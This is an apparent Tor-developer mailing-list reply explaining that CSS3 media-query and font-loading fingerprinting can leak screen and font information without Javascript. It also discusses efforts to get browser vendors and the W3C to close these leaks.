Thus spake Just A. User (just_a_user@xxxxxxxxxxxxx): > http://what-is-my-ip-address.anonymous-proxy-servers.net > are able to discover the browser's window inner dimensions > accurately. > > The font downloading attack (@font-face based) from that test is > also successful. The short answer here is that new CSS3-based fingerprinting attacks are currently not possible to fully defend against through extension-land, and that while we do take them seriously, we don't have a lot of options to truly protect against them in the short term. JonDoNym is performing a bit of slight of hand on its users wrt to these attacks. It only "protects" against these attacks by requiring that Javascript be disabled, but this is not a full defense. The CSS3 "Media Queries" allow you to select entire stylesheets to be loaded on the basis of screen resolution and display information: https://developer.mozilla.org/En/CSS/Media_queries Thus, media queries are quite capable of inducing element loads based on screen resolution and font information, which can be used to ping a server with information about your resolution without the need for Javascript. The mechanisms for this are similar to the CSS-only history attack that does not require Javascript and works on Firefox 2.x and 3.x: http://ha.ckers.org/weird/CSS-history-hack.html The JonDoNym test is only using the Javascript versions of these attacks, and therefore the JonDoFox profile they provide is given a green "pass" against them, even though a dedicated adversary could extract the same information with CSS3 alone. When I run Torbutton with Javascript disabled, I get very similar results to the JonJoFox profile on their test (are you sure you had javascript fully disabled?) But again, the reality is this is not the whole story. We are currently actively trying to get people at the W3C and inside Google and Mozilla to address these issues, because short of us patching the browsers directly, there is not much we can do here. We may end up patching our Tor Browser Bundle builds if it doesn't appear that any of these groups are taking these new fingerprinting vectors seriously. This places us in an interesting legal situation with Mozilla, because technically such a patch means that we can no longer use the trademark "Firefox" to describe the browser we provide in this case. Our goal for the W3C is to get them to define a common subset of rendering behaviors that all browsers can adhere to while in "private browsing mode". I believe the timeline for adoption of this standard would be measured in multiple years, though. Our goal with the browsers is to convince them to provide us with some kind of API to interact with CSS and the rendering system. For Chrome, their release cycle is faster and this process would be measured in months (if we had all the other APIs we needed, see https://blog.torproject.org/blog/google-chrome-incognito-mode-tor-and-fingerprinting). But for Firefox, their release cycle is slower, and this time period is probably still measuted in years. So to sum it up, lots of rocks, and lots of hard places :/ -- Mike Perry Mad Computer Scientist fscked.org evil labs
Attachment:
pgpzilTT8EAGw.pgp
Description: PGP signature